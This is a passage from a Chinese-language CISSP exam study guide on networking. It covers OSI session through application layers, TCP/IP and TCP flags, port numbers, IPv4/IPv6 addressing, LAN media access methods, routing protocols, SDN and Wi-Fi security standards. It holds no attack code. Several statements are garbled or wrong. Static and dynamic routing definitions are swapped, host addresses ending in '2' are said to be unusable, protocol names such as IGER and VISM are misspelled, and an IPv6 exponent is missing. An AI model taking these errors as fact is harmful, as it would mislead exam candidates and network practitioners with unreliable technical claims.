验证检查点以来失败或丢失的 PDUs。该层协议有: ■ Network File System (NFS) 网络文件系统 ■ Structured Query Language (SQL) 结构化查询语言 ■ Remote Procedure Call (RPC) 远程过程调用 ■ Network Basic Input Output System(NetBIOS) ■ PAP 密码认证协议 Password Authentication Protocol ■ PPTP 点对点隧道协议 Point-to-Point Tunneling Protocol ■ DNA SCP Digital Network Architecture Session Control Protocol. 第六层:表示层 表示层负责将从应用层接收的数据转换为遵从 OSI 模型的任何系统都能理解的格式,如: 将 Unicode 编码的数据转换为 ASCII 或 EBCDICM 字符集。它向数据中强行添加通用的或标准的 结构和格式化规则。表示层还负责加密和压缩。因此,它成为网络和应用程序之间的接口。通 过确保数据格式能够被两个系统支持,表示层准许不同的应用程序通过网络交互。大多数文件 或数据格式在这一层上出现,包括图像、视频、音频、文档、电子邮件、Web 页面和控制会话 等格式。该层协议有: ■ American Standard Code for Information Interchange (ASCII) 美国信息交换标准 代码 ■ Extended Binary-Coded Decimal Interchange Mode (EBCDICM) 扩充二进制编码的十 —107— 进制交换码 ■ Tagged Image File Format (TIFF) 标签图像文件格式 ■ Joint Photographic Experts Group (JPEG) 联合图像专家组 ■ Moving Picture Experts Group (MPEG) 运动图像专家组 ■ Musical Instrument Digital Interface (MIDI) 音乐设备数字接口 第七层:应用层 本层为应用或者操作系统,提供网络接收或者发送服务,负责将协议栈与用户的应用程序、 网络服务或操作系统连接在一起。应用程序并不位于应用层内,只是通过相关的协议来对外通 信。该层协议有: ■ Hypertext Transfer Protocol (HTTP) 超文本传输协议 ■ File Transfer Protocol (FTP) 文件传输协议 ■ Line Print Daemon (LPD) 行式打印机后台程序 ■ Simple Mail Transfer Protocol (SMTP) 简单邮件传输协议 ■ Telnet 远程登录 ■ Trivial File Transfer Protocol (TFTP) 普通文件传输协议/主要用来更新设备的配置文件 ■ Electronic Data Interchange (EDI) 电子数据交换 ■ Post Office Protocol version 3 (POP3) 邮局协议第三版 ■ Internet Message Access Protocol (IMAP) 互联网消息访问协议 ■ Simple Network Management Protocol (SNMP) 简单网络管理协议 ■ Network News Transport Protocol (NNTP) 网络新闻传输协议 ■ Secure Remote Procedure Call (S-RPC) 安全远程过程调用 ■ Secure Electronic T ransaction (SET) 安全电子交易 三、TCP/IP 模型 TCP/IP 模型也称为 DARPA 或 DOD 模型,和 OSI 的对比前面已经讲了,分四层: ④应用层 Application,没什么好讲的 ③传输层 Transport (也称为主机到主机层 Host-to-Host),包括 TCP 和 UDP 协议。 ②网络层 Internet (也称为互联网层 Internetworking),包括 IP、ICMP、IGMP 等协议。 ①网络接入层 Link(网络接口层 Network Interface/网络访问层 Network Access)。 重点讲下 TCP/IP 在传输层的传输控制协议 TCP 和用户报文协议 UDP 协议。 ①UDP 是一种无连接的、不可靠的协议。这并不意味着 UDP 设计不佳。相反,应用层将执 行错误检查,而不是该协议。UDP 常用于传输音频和视频。它的报头很简单,四个字段: 1.源端口 Source port;2.目的端口 Destination port;3.报文长度 Message length; 4.校验和 Checksum。 ②TCP 是面向连接、可靠的协议,提供无差错传输保证完整性。 *TCP 三次握手确保通信会话的建立的可靠性,其描述如下: 1.客户端(源)向服务器发送 SYN (同步)数据包。 2.服务器(目的)使用 SYN/ACK (同步和确认)数据包响应客户端。 —108— 3.客户端使用 ACK(确认)数据包响应服务器。 *如果要结束会话,有两种方法断开: 1.最常用的方法是使用 FIN (finish) 数据包来代替 SYN 数据包;收发双方都要发一个 FIN 包,对方通过 ACK 确认,完成中断要产生 4 个包。 2.使用 RST (reset) 数据包够使会话立即和突然终止。 *TCP 的数据包完整性和顺序的确认: 通过 TCP 报头中的序列值(sequence number)来确认收到数据包的顺序。接收方不一定 每收一个包都要回复一个确认信息,如果信道质量好,可能一次多了好多包以后再回复确认; 回复确认之前传输的数据包数称为传输窗口(transmission window),只有一个窗口里的数 据都确认了,再发下一组的数据。这就是所谓的滑动窗口机制,窗口越大速度越快,但如果丢 包率高,那速度就大打折扣了。当然,这个窗口值是可以动态变化的。 下面介绍 TCP 报头。前面讲了很多“包”,其实传输层应该叫段(TCP)和报文(UDP), 这里混用了。与 UDP 协议相比,TCP 报头相对复杂,长度为 20 到 60 字节,有这么些内容要了 解(数字是占多少比特位),还有些字段是不会考的,没列出来。报头字段分配: 源端口-16,目的端口-16;序列号-32,窗口大小-16;预留-4,可变量-(32 的位数); 标志-8(flag)。 这个“标志”flag 指示了 TCP 数据包的功能,并且请求接收方采用特定的方式进行响应。 标志字段的长度为八个比特,代表了 8 个标志符,其中某个比特位数值为 1 时,它代表的标志 符就生效,为 0 则不生效。所以最多可以同时 8 个标志都生效,当然这种情况没有。 1.CWR:拥塞窗口减少 Congestion Window Reduced 2.ECE:拥塞回复 ECN-Echo (Explicit Congestion Notification) 3.URG:紧急数据 Indicates urgent data 4.ACK:确认 Acknowledgement 5.PSH:立即推送数据 Indicates need to push dataimmediately to application 6.RST:重置 Reset,立即中断 TCP 会话 Causes immediate disconnect of TCP session 7.SYN:同步,Synchronization,要求与序列号同步 8.FIN:结束,协商正常结束会话,Finish Requests graceful shutdown ofTCP session 当 TCP 字段封装成 IP 包时,包头会加上协议字段。IP 包里用数值 6 来代表这个包里的数 据是 TCP 协议发来的。相应的,1 表示 ICMP 协议;2 表示 IGMP;6 表示 TCP;用数值 17 表示 数据是 UDP 协议;51 表示 AH(IPSec 的认证头部)。 ③当一个通信连接在两个系统之间建立起来时,它通过端口(port)的使用完成操作。TCP 和 UDP 都有 65536(2 16)个端口(16 位)。端口,也被称为套接字(socket)就是通信链接两 端传输数据同意使用的地址号。 *保留端口/知名端口/服务端口 well-known ports or the serviceports:0~1023。如: FTP/TCP20、21,SSH 22,Telnet/TCP23,SMTP/TCP25,DNS/UDP53, 终端访问控制器访问控制系统(TACACS+)/TCP49, 终端访问控制器访问控制系统 TACACS 和 XTACACS/UDP49, 引导协议(BootP)和 DHCP/UDP67、68, —109— 普通文件传输协议 TFTP/UDP69, HTTP/TCP80,POP3/TCP110,网络时间协议 NTP/123, NetBIOS 服务/137-139, 互联网邮件身份验证协议 IMAP/TCP143, SNMP/UDP161(162 用于跟踪信息),轻量级目录访问协议 LDAP/TCP389、SSL636, HTTPS+SSL 或 TLS/TCP443,活动目录 AD/445,日志服务/UDP514 打印后台程序 LPR、LPD/TCP515、9100, 下面是已注册端口: Microsoft SQL Server 1433,Oracle 1521,H.323 1720,PPTP 1723 网络文件系统 NFS/TCP2049,RDP 3389, Diameter 访问控制协议/TCP3868, X 视窗(XWindow)/TCP6000-6063, *注册端口/己注册软件端口 registered software ports:1024~49151。这些端口具有注 册到 IANA(www.iana.org)的一个或多个互联软件产品,目的是为客户端连接提供一个标准的 端口编号系统。 *动态端口/私用端口/随机端口 random ports:49152~65535。这些端口是随机的、动态 的、私用的、临时的使用,没有规定标准的用途。 4.重点看看 IP 协议 IP 是无连接的、不可靠的数据报服务,不保以正确顺序传送数据包,因此,你必须在 IP 上使用 TCP,从而获取可靠的和受控的通信会话。 ①IPv4 与 IPv6 IPv4 使用 32 比特的地址,而 IPv6 则使用 128 比特地址。IPv6 提供了作用域地址、自 动配置和 QoS 优先值等新功能。作用域地址使管理员能够进行分组以及随后阻止或允许对网络 服务(例如文件服务器或打印)的访问。自动配置排除了对 DHCP 和 NAT 的需求。QoS 优先值允 许基于优先顺序内容来管理通信。 IP 地址等级与分类已经不知道说了多少遍了: A 类: 0, 1–126, 255.0.0.0/8;1 个 A 共 16777214 个主机 B 类: 10, 128–191, 255.255.0.0/16;1 个 B 共 65534 个主机 C 类: 110, 192–223, 255.255.255.0/24;1 个 C 共 254 个主机 D 类: 1110, 224–239, D 用于多播; E 类: 1111, 240–255, E 预留待用; 127:留给环路地址,用于自检排障,尽管实际中只使用了一个 127.0.0.1。 私网/专有地址(RFC1918 定义),A、B、C 各一段,在讲 NAT 的时候会用到: 10.0.0.0/8, 即:10.0.0.0~10.255.255.255,1 整个 A 172.16.0.0/12, 即:172.16.0.0~172.31.255.255,16 个 B 192.168.0.0/16,即:192.168.0.0~192.168.255.255,255 个 C 32 位的 IP 地址可以用 4 个数字(小于 255)来表示,末位的 0 和 2 不能用于主机,255 用于广播地址。每个地址分为两个部分:网络地址和主机地址。网络地址,由相关组织分配, —110— 代表了网段。A 类网络地址是使用最左边的一位字节作为网络地址编号,B 类网络地址是使用 最左边的两位字节作为网络地址编号,等等。 为了简化网络管理,网络通常被划分为多个子网,用子网掩码来定义和识别子网的网段。 在如果左边的三字节(24 位)用于区分不同的子网(网络地址),子网掩码是 11111111 11111111 11111111 00000000,用十进制表示为 255.255.255.0,使用无类域间路由选择(CIDR,classless interdomain routing)可表示为/24(使用掩码位)。使用掩码位的一个重要优点是能够将多 个不相邻的地址集组合在单个子网内。例如,我们可以将若干 C 类子网组合为一个更大的子网 分组。 IPv6 是一个 v4 的下一代协议,包括: *更多的地址空间:IPv6 的地址是 128 位,支持 2 台主机。*增强的安全性(自带 IPsec)。 *增强的质量服务(QOS)。 IPv6 的表示方法: ①冒分十六进制表示法 格式为 X:X:X:X:X:X:X:X,其中每个 X 表示地址中的 16b,以十六进制表示,例如: ABCD:EF01:2345:6789:ABCD:EF01:2345:6789 这种表示法中,每个 X 的前导 0 是可以省略的,例如: 2001:0DB8:0000:0023:0008:0800:200C:417A→ 2001:DB8:0:23:8:800:200C: 417A ②0 位压缩表示法(用::表示 0) 在某些情况下,一个 IPv6 地址中问可能包含很长的一段 0,可以把连续的一段 0 压缩为 “::”。但为保证地址解析的唯一性,地址中”::”只能出现一次,例如: FF01:0:0:0:0:0:0:1101 → FF01::1101; 0:0:0:0:0:0:0:1 → ::1 0:0:0:0:0:0:0:0 → :: ③内嵌 IPv4 地址表示法 为了实现 IPv4-IPv6 互通,IPv4 地址会嵌入 IPv6 地址中,此时地址常表示为: X:X:X:X:X:X:d.d.d.d,前 96b 采用冒分十六进制表示,而最后 32b 地址则使用 IPv4 的点分十进制表示,例如: ::192.168.0.1 与 ::FFFF:192.168.0.1 就是两个典型的例子。在前 96b 中,压缩 0 位的方法依旧适用。 考题中有出现 Teredo,即面向 IPv6 的 IPv4 NAT 网络地址转换穿越:在 IPv6/IPv4 主机 位于一个或多个 IPv4 NAT 之后时,用来为单播 IPv6 连接提供地址分配和主机间自动隧道。 为能够通过 IPv4 NAT,IPv6 数据包作为基于 IPv4 的用户数据包协议(UDP)消息发送出去。 Teredo encapsulates IPv6 packets within UDP datagrams with IPv4 addressing. IPv6-aware systems behind the NAT device can be used as Teredo tunnel endpoints even if they do not have a dedicated public IPv4 address. 5.域名解析与寻址 网络上的地址有三个层次:底层的 MAC,中层的 IP,高层的域名;用到了 DNS、LDAP 什么 —111— 的。通过这些名字可以在网上定位和识别一个终端或客户端。它们都不安全,都可能被篡改。 6.远程过程调用 RPC-Remote Procedure Call RPC 是指跨主机执行对象的能力。工作在第五层,会话层。 7. Internet/lntranet/Extranet • 互联网 Internet =外部不可信网络 • 内联网 lntranet =内部网络 • 外网 Extranet =外部不完全可信(例如,业务合作伙伴) A.2 IP 网络连接 这里重点讲局域网 LAN。 LAN(局域网)技术存在三种主要类型:以太网、令牌环和 FDDI。CISSP 考试仅涉及这三种 主要类型。LAN 技术之间的差别存在于数据链路层及其以下层(二层)。 1.以太网 Ethernet 以太网基于 IEEE 802.3 标准,单独的以太网数据单元称为帧。以太网是一种共享介质的 LAN 技术,也称为广播技术。这意味着它准许很多设备在相同的介质上进行通信,但是要求每 —112— 台设备轮流通信并且执行冲突检测和避免操作。以太网采用广播域和冲突域。当两条被传输的 消息企图同时使用网络介质时,就会出现数据冲突,这会导致其中一条或者两条消息出现。以 太网可以支持全双工的通信,最常在星型或总线型拓扑上部署。以太网能够支持 100M 到 10Gbps 的速率(吞吐量)。 2.令牌环网 Token Ring 令牌环采用令牌传递机制来控制哪些系统可以在网络介质上传输数据。令牌在 LAN 所有 成员形成的逻辑环上进行传递。令牌环可以采用环型或星型网络拓扑。由于令牌环的性能有限, 比起以太网来成本又高,而且会增加部署和管理的难度,今天己极少使用。 令牌环可通过使用多站访问部件(MAU)配置为物理星形结构。 3.光纤分布式数据接口(FDDI) Fiber Distributed Data Interface 光纤分布式数据接口(FDDI)是一种使用两个环的高速令牌传递技术,其中信息流在两个环 上沿相反的方向传输。FDDI 常用作大型企业网络的主干,它的双环设计允许实现自愈,即从 环中去除故障网段,并且利用剩下的部分内部环和外部环建立单个环。虽然 FDDI 价格昂贵,但 是在快速以太网和千兆以太网出现之前常常被用在校园环境中。价格稍便宜、距离有限且速度 更慢的版本称为铜线分布式数据接口(CDDI)。CDDI 也更容易遭到干扰和偷听。 4.基础数据通信技术 ①模拟通信与数字通信 Analog and Digital 使用频率、幅度、相位、电压等发生变化的连续信号时,就会进行模拟通信。连续信号的 差异会产生一个波形(与数字信号的方被形成对照)。连续信号的差异实现实际通信。 通过使用非连续的电子信号以及状态改变或开关脉冲,就会出现数字通信。在长距离传输 或存在干扰时,数字信号比模拟信号更可靠。 模拟和数字的区别很容易,如果以前没搞过通信,自己补补课。 ②同步和异步 Synchronous and Asynchronous 同步通信依赖于定时或时钟机制,这种机制基于独立的时钟或数据流内嵌的时间标记。同 步通信通常能够支持非常高速的数据传送。 异步通信依赖于停止和开始定界位来管理数据的传输。因为使用了定界位以及传输的停止 和开始特征,所以异步通信最适用于较少量的数据。公用电话交换网(PSTN)调制器就是异步通 信的一个绝佳示例。 同步速度快,异步速度慢。 ③基带和宽带 Baseband and Broadband 在一个线缆段上能够同时发生的通信数取决于使用的是基带技术还是宽带技术。基带技术 只能支持单个通信信道,它使用直流电应用于线缆,其中有电流表示二进制信号 1,无电流表 示二进制信号 0。基带是一种数字信号形式。以太网线就是基带技术。 宽带技术能够支持多个同时发生的信号。宽带使用频率调制来支持许多信道,每个信道都 支持一个截然不同的通信会话。宽带适用于高吞吐率,尤其适用于若干信道复用的情况。宽带 是一种模拟信号形式。有线电视、线缆调制器、ISDN、DSL、Tl 以及 T3 都是宽带技术的示例。 ④介质访问 LAN Media Access 有五种局域网传输介质共享与冲突避免技术是比较重要的,即 LAN 介质访问技术,用来避 —113— 免或阻止传输冲突(必考)。 1.载波侦听多路存取(CSMA) Carrier-Sense Multiple Access/死等 1)主机侦听 LAN 介质,从而确定 LAN 介质是否正在使用中。 2)如果 LAN 介质未被使用,那么主机就传输其通信数据。 3)主机等待确认信号。 4)如果超时未接收到确认信号,那么主机从第一个步骤开始重新执行操作。 CSMA 不解决冲突,如果发生冲突,那么通信就不成功,因此也不会接收到确认信号。 2.有冲突避免的载波侦听多路存取(CSMA/CA) CSMA with Collision Avoidance/避免 1)主机有两个连接与 LAN 进行交互:通过入站(inbound)连接监听介质状态,通过出站 连接(outbound)执行实际通信传输。第一步就是:主机侦听入站连接(inbound),确定 LAN 介质是否正在使用中。 2)如果 LAN 介质未被使用,那么主机就请求传输特权。 3)如果超时之后仍未获得特权,那么主机从第一个步骤开始重新执行操作。 4)如果被授予特权,那么主机就通过出站连接传输其通信数据,不过也要先发送通信请求 SYN 给接收端,等回应后和建立通信会话。 5)主机等待确认信号 ACK,有则通,没有则断。 6)如果超时之后仍未收到确认信号,那么主机从第一个步骤开始重新执行操作。 Apple Talk 和 802.11 无线网络连接是利用 CSMA/CA 技术的网络例子。CSMA/CA 系统要 求指定一个主系统,这个系统能够响应请求以及授予发送数据传输的特权。 3.有冲突检测的载波侦听多路存取(CSMA/CD) CSMA with Collision Detection/检测 1) 主机侦听 LAN 介质,从而确定 LAN 介质是否正在使用中。 2) 如果 LAN 介质未被使用,那么主机就传输其通信数据。 3) 在数据传输的同时,主机侦听冲突(也就是其它主机同时传送数据的情况)。 4) 如果检测到冲突,那么主机就会传输一个停发信号。 5) 如果接收到停发信号,所有主机都会停止数据传输。每台主机都会等待一个随机的时 间周期,然后从第一个步骤开始重新执行操作。 以太网利用了 CSMA/CD 技术。通过使冲突域的每个成员在重新开始传输过程之前都进行 随机的短时间等待, CSMA/CD 可以响应冲突。不过,准许冲突发生以及随后对冲突的响应或 反应会导致传输延迟以及要求重复传输,这会导致损失百分之四十左右的潜在吞吐量。 4.令牌传递 Token Passing 持有令牌的主机有权传输数据。一旦传输完成,主机就会将令牌释放给下一个系统。令牌 传递用在令牌环网络中。(令牌永远不会有冲突,但复用效能差,所以用多个环) 例如 FDDI:它是 100M 的骨干网络,只有一个主环被使用,另一个环是备份环;两个环的 方向相反;环也被称为计数器旋转。 5.轮询 Polling 这是一种使用主从配置进行通信的 LAN 介质访问技术。一个系统被标记为主系统,其他 所有系统则被标记为从属系统。主系统依次轮询或了解每个从属系统是否需要传输数据。如果 某个从属系统表明了这种需求,那么就会被授予传输数据的特权。一旦该系统的传输结束,主 —114— 系统就继续轮询下一个从属系统。同步数据链接控制(SDLC)就使用了轮询。 轮询通过使用许可系统来解决冲突。轮询是 CSMA/CA 方法的逆过程。虽然二者都使用主从 结构,但是 CSMA/CA 允许从系统请求特权,而轮询则由主系统提供特权。轮询可以被配置为 授予某个(或多个)系统具有比其他系统更高的优先权。例如,如果标准的轮询模式为 1、2、3、 4.那么就可以指定系统 l 优先,轮询模式相应会变化为 1、2、l、3、1、4。 6.路由协议 路由器提供了异构网互联的机制,实现将一个网络的数据包发送到另一个网络。路由协议 就是用来规范 IP 数据包发送过程中寻找目的的规定和标准。 自治域 AS(autonomous systems),独立的广域网。 ①静态路由 static,自动发现和维护路由表。 ②动态路由 dynamic,手动配置路由表。 IGP 内部网关协议 有 IS-IS,IGER,EIGER 等 。 1.距离向量协议 destination metric:使用跳数或向量来确定最短距离。如路由信息协 议 RIP(Routing Information Protocol) 2.链路状态协议 link-state:不考虑跳数,使用“图形理论”算法或最短路径优先算法, 有更短的收敛时间,支持 VISM(可变长子网掩码)和 CIDR。如开放最短路径优先协议 OSPF(Open Shortest Path First)。 3.开放最短路径优先(OSPF) OSPF 协议是一种基于最短路径优选和链路状态算法的网络层路由协议。路由器使用链路 状态算法通告发送路由信息给网络内的所有节点,各节点使用最短路径信息计算到其他每个节 点的最优拓扑。每个路由器发送部分的路由表(路由到部分网络目的地的信息)描述自己的链路 状态,有的时候也并发送完整的路由结构(拓扑)。最短路径算法的优点是,使用较小的 LSA 信 息进行更频繁的更新。它们收敛很快,从而防止路由环路问题,避免计数到无穷大(对于一个 特定的网络,路由器的跳数不断增加)。最短路径算法的缺点是,它们需要大量的 CPU 能力和 内存空间。 EGP 外部网关协议 已经过时的路由协议。常用的有: BGP(Border Gateway Protocol):一种高级的距离向量路由协议。 A.3 多层协议的含义(例如:DNP3) DNP3 是 CISSP 考试的内容之一,主要用于电力和水利行业的使用和管理,支持数据采集 系统和系统控制设备之间的通信(工业控制系统 SCADA)。它包含子站计算机、RTU(远程终端 单元/通过嵌入式微处理器控制设备)、IED(智能电子设备)和 SCADA 主站(即控制中心)。 DNP3 是一个开放的公共的标准,不提供安全性,是个多层协议且功能类似 TCP/IP。 多层协议和聚合协议是两个相关联的概念,没必要严格区分,分层协议有些固有的优点: 1.高层可使用更为广泛的协议;2.通过封装在不同层进行合作;2.灵活和弹性。 分层架构也有缺点: —115— 1.存在隐蔽信道; 2.过滤机制可被绕行; 3.逻辑网络段边界可以被逾越; 4.协议栈漏洞、数据不安全、会话劫持/中间人攻击、操作系统与服务的弱点,设备后门。 A.4 聚合协议(例如:FCoE,MPLS,VoIP,iSCSI) 聚合协议也称为汇聚协议/融合协议(Converged Protocols),一个融合多层的网络基础 设施,也就是 IP 聚合(IP Convergence),可以带来以下好处: ①对多媒体应用的良好支持。 ②一个 IP 融合网络是一个支撑多种创新应用交互的独立平台。 ③融合 IP 网络更易于管理,因为系统资源设置可以统一设置。 ④一个需求较少网络组件的统一环境。 典型应用就是传统的自动电话交换网(电路交换)已经从所谓的软交换过渡到融合通信了。 1.以太网光纤通道(FCoE) Fibre Channel over Ethernet 以太网光纤通道(FCoE)是网络存储解决方案(存储区域网络 SAN 或网络附加存储 NAS)的 一种形式,一个轻量级封装协议,缺乏 TCP 层的可靠数据传输,它允许高达 16Gbps 的上行高 速文件传输。通过这一技术,光纤通道作为一个网络层或 OSI 第三层协议,替换 IP 作为一个 标准的以太网网络负载(一、二、三层都融合在一个光纤通道上)。FCoE 必须使用 DCB-enable 模式的以太,并使用无损通信保证级别,不使用 TCP 或 IP 协议是一个 2 层(非路由)协议, 仅支持一个数据中心内的短距通信。DCB 是指数据中心桥接标准。 2.MPLS(多协议标签交换)Multiprotocol Label Switching MPLS 是一个广域网协议,是一种高通过、高性能的网络技术,它将数据在网络中以基于 最短路径的标签而不是更长的网络地址进行传输。这种技术节省了传统的基于 IP 的路由过程, 这个过程可能是相当复杂的。此外,MPLS 可以封装处理更广泛的协议,不局限于 TCP/IP,包 括 T1/El、ATM、帧中继、SONET 和 DSL 等。 3.IP 语音(VoIP)Voice over IP(考点) 是用于在 TCP/IP 网络传输语音/视频/数据的一种隧道机制,可以取代 PSTN。VoIP 系统 是基于会话发起协议(SIP)的使用,这是公认的标准。任何 SIP 兼容设备可以彼此通信。VoIP 也存在一些问题: ①丢包:通过数据包丢失隐藏(PLC)的技术,掩盖丢包的影响。有几种实现方法:一是零 替代,最简单,用空值替代丢失的包;二是间隙插值,就是线性插值计算来填充。 ②抖动:抖动导致通话延迟,但不完全是因为网络延迟原因造成的,可通过增加数据包缓 冲区大小来补偿抖动。 ③顺序错误/序列误差:顺序错误导致通话质量恶化通常,因为经过路由的网络数据包可 能以不同的顺序到达目的。 SIP 协议 Session Initiation Protocol(会话发起协议)用来处理多媒体连接,通过 MD5 哈希提供完整性保护。 4.互联网小型计算机系统接口(iSCSI) —116— 互联网小型计算机系统接口(iSCSI)是一个基于 IP 的网络存储标准。这项技术可以用来支 持位置独立的文件存储、传输和局域网、广域网的检索,或者公共互联网连接。iSCSI 常被认 为是光纤通道(FCoE)的一种低成本替代。 A.5 软件定义网络 1.软件定义网络(SDN) Software-Defined Networking SDN 基于这样一个现实情况,即传统网络设备配置的复杂性(如路由器和交换机)经常强迫 组织依附于一个单一的设备广商,如思科,限制了网络的灵活性难以应对不断变化的物理和商 业条件。SDN 移除了 IP 寻址、子网、路由以及诸如此类繁杂的数据通信技术。SDN 通过高效的 网络虚拟化,提供了一种直接从中央位置进行新网络设计的方法,它是灵活的、与厂商无关的、 可并且是基于开放标准。利用 SDN 使得组织可以不从单一供应商采购设备。相反,它允许组织 混合和匹配需要的硬件,如选择最划算的或最高通过性能的设备而不管其供应商是谁。之后, 通过集中管理接口进行配置和管理硬件控制。此外,在硬件上的应用设置可以根据需要动态地 进行变更和调整。SDN 旨在把控制层(即网络服务的数据传输管理)和基础设施层(即硬件和基 于硬件的设置)分离。也就是把网络分为三层(控制与数据分离),有 2 类接口: ①控制层(控制平面):SDN 控制器包括一个或多个 NBI(北向接口)代理、SDN 控制逻辑 和并控制数据平面接口(CDPI)驱动程序。 ②应用层(应用平面):SDN 应用程序通过北向接口(NBI)与 SDN 控制层面进行通信。一个 SDN 应用程序由一个 SDN 应用逻辑和一个或多个 NBI 驱动器构成。它的功能就是执行和实现上 层的控制指令,满足应用的网络需求。 ③基础设施层(数据平面):SDN 数据通路是一个逻辑网络设备,包括 CDPI(SDN 控制数据 平面接口)代理和一组一个或多个流量转发引擎和零个或多个业务处理功能。 两类接口: ①SDN 控制数据平面接口(CDPI):SDN CDPI 定义 SDN 控制器和一个 SDN 数据通路之间的 接口,它提供了所有的转发操作,编程控制功能的通告,统计报告和事件通知。 ②SDN 北向接口(NBI):是 SDN 应用层与控制器之间的通信接口,表达和传递网络的行为 及需求。北向是上层的,管理的;南向是下层的,操作的。 A.6 无线网络 1.各种无线网络通信标准 802.11 泛指整个协议簇,也指第一个无线协议,反正有好多标准,必考: ①802.11: 2.4G, 2M, WEP 801.11b: 2.4G, 11M, DSSS(直接序列扩频),有 14 个 22Mhs 频宽的频道,兼容 802.11e: 2.4G,提供 QOS 802.11f: 2.4G,支持 AP 漫游(IAPP 协议) 802.11g: 2.4G,54M(物理层)24M(传输层), 兼容,OFDM(正交频分) 低频 2.4G 的 Befg 记忆:小蜜蜂飞机 ③802.11a: 5G,54M(物理层)24M(传输层),OFDM(正交频分),短距,美国用,不兼容 —117— 802.11h: 5G,用于欧洲 802.11n:2.4G&5G, >275M,MIMO(多入多出),4 天线,20MHz 频宽,兼容 802.11ac:5G,1000M 高频 5G 的 Ahnac 记忆:A-hn-AC,爱湖南菜,标准 n 是双频的。 ④802.11j: 多标准集成,为了适应日本的 5G 频率标准。(J 就是搞 Japan) ⑤802.16: MAN(无线城域网),WiMAX(小灵通,6M~30M)(记忆:16 比 15 大) 802.15: WPAN(无线个人局域网),蓝牙,2.4G,3Mbps,10 米(33 英尺) ⑥802.11i:针对 802.11 的 WEP 安全问题,定义了基于 AES 的 CCMP 协议,支持 WPA2 ⑦802.1x:不只是针对无线网,它就是一套独立的用于认证的协议。 2.无线网络组网通信的几种模式 1.基础设施模式 infrastructure mode 需要一个网络接入点 AP! ①独立模式 stand-alone:1 个 AP 的无线局域网,不外联。 ②有线扩展模式 wired extension:通过 AP 接入有线网。 ③企业扩展模式 enterprise extended:广域到处都有很多 AP,它们属于同一个公司用同 一个扩展服务集标示符 ESSID,接入同一个有线网。 ④桥接 bridge:连接 2 个有线网,起桥接作用。 2.点对点模式 ad hoc mode 终端直接通信,没有 AP。 3. SSID 服务集标示符 service set identifier SSID 通常用来表示一个无线网络的名称。有 2 种类型: ①扩展服务集标识符 ESSID。是使用无线基站或 WAP 的无线网络名称。 ②基本服务集标识符 BSSID。是使用 adhoc 或点对点模式时无线网络的名称。然而,在基 础设施模式下运行时, BSSID 拥有 ESSID 基站主机的 MAC 地址,用于区分一个扩展无线网络 中的多个基站。 SSID 最好关闭,以提高安全性。 4.无线网状网络 Wireless Mesh Network (WMN) 由无线节点组成的一个网状拓扑,每个节点可以替代转发,可以自愈。 Ad-hoc 网络和无线 Mesh 网络都采用分布式、自组织的思想形成网络,网络每个节点都具 备路由功能,随时为其他节点的数据传输提供路由和中继服务。但是: Ad-hoc 网络主要侧重应用于移动(运动)环境中,数据流可以包括语音、数据和多媒体 信息;是一种多跳的、无中心的、自组织无线网络,又称为多跳网(Multi-hop Network)、 无基础设施网(Infrastructureless Network)或自组织网(Self-organizing Network)。 整个网络没有固定的基础设施,每个节点都是移动的,并且都能以任意方式动态地保持与其它 节点的联系。在这种网络中,由于终端无线覆盖取值范围的有限性,两个无法直接进行通信的 —118— 用户终端可以借助其它节点进行分组转发。每一个节点同时是一个路由器,它们能完成发现以 及维持到其它节点路由的功能。 无线 Mesh 网络是一种无线宽带接入网络,让用户在任何时间、任何地点都可以接入互联 网进行高速无线访问。 无线 mesh 网络,由 mesh routers(路由器)和 mesh clients(客户端)组成,其中 mesh routers 构成骨干网络,并和有线的 internet 网相连接,负责为 mesh clients 提供多跳的无 线 internet 连接。 无线 Mesh 网络(无线网状网络)也称为“多跳(multi-hop)”网络,它 是一种与传统无线网络完全不同的新型无线网络技术。 3.无线网络的加密和安全(必考) 最早的 802.11 标准基本上是不安全的。IEEE 802.11 标准定义了两种无线客户端向无线 接入点进行验证的方法:开放系统认证(OSA)和共享密钥认证(SKA)。OSA 是不认证的,连上就 通信,而且纯明文传输;SKA 要求身份验证,可选用 WEB、WPA、WPA2 等验证技术。 先总结一下: WEP:64/128 位密钥,RC4 对称流加密,使用初始向量。 WPA:64/128 位密钥,RC4 对称流加密,MIC(消息完整性检查),TKIP+RADIUS WPA-PSK:64/128 位密钥,RC4 对称流加密,MIC(消息完整性检查),TKIP+PSK WPA2:128 位密钥,AES,MIC(消息完整性检查),CCMP+RADIUS WPA2-PSK:128 位密钥,AES,MIC(消息完整性检查),CCMP+PSK ①WEP 有线等效保密协议/有线等效私密性协议 Wired Equivalent Privacy WEP 使用一个静态的公共密钥和使用脆弱的 IV(初始向量),不到 60 秒就可以破解 WEP。 流密码基于共享密钥,产生密钥流,即伪随机比特序列,和一个初始化向量(IV)。密钥对明文 进行异或运算后产生的密文。流密码的一个重要特性是,如果明文和密文的密钥流序列是己知 的,密钥可以通过简单的异或明文和密文恢复(已知明文、密文攻击),恢复的密钥可以被攻 击者用来加密的挑战文本的任何后续的访问点生成的异或值加在一起,产生一个有效的认证响 应。因此,攻击者可以通过访问点的身份验证。 ②Wi-Fi 保护访问(WIFI 网络安全存取)WPA/ Wi-Fi Protected Access 替代 WEP,直到 802.11i 修订完成,又被 WPA2 取代。 Wi-Fi 访问保护是基于 LEAP 和 TKIP(临时密钥完整性协议)加密体系的基础上并对认证 过程进行加密。使用之前介绍的 802.lx 认证协议,来进行用户身份认证。如果使用单个静态 的密码,仍有可能被暴力破解。 ③WPA2(WIFI 网络安全存取 2) 它的原理和 WPA 其实是完成不同的,使用了计数器模式的密码块链接消息认证码协议 (CCMP) Counter Mode Cipher Block Chaining Message Authentication Code Protocol,这 基于 AES 的加密方案,目前还没有被破解的案例。 ④802.1X/EAP(必考) 802. lX 是无线网络利用现有的网络基础设施进行认证服务的协议,包括多种技术解决方 案,如 RADIUS、TACACS、证书、智能卡、令牌和生物识别设备笔。802.1X 可以实现客户端没 —119— 有得到入网允许,没有得到 IP 地址前,将用户 MAC 地址信息和符合信息传输到服务器进行验 证,通过了就可以分配 IP 让客户端入网了。也就是路由器要支持 802.1X。但是在发送身份信 息过程中可能被劫持什么的,所以它还要附加一些加密的协议和功能。 EAP(可扩展认证协议) Extensible Authentication Protocol 是一个认证框架而不是一 个具体的认证机制,允许采用各种新的认证技术与现有技术兼容。有超过 40 种不同的 EAP 认 证方法获得广泛地支持,如:LEAP,EAP-TLS,EAP-SIM,EAP-AKA 和 EAP-TTLS。其中,有些比 较老的技术已经被破解了,如:EAP-MD5。 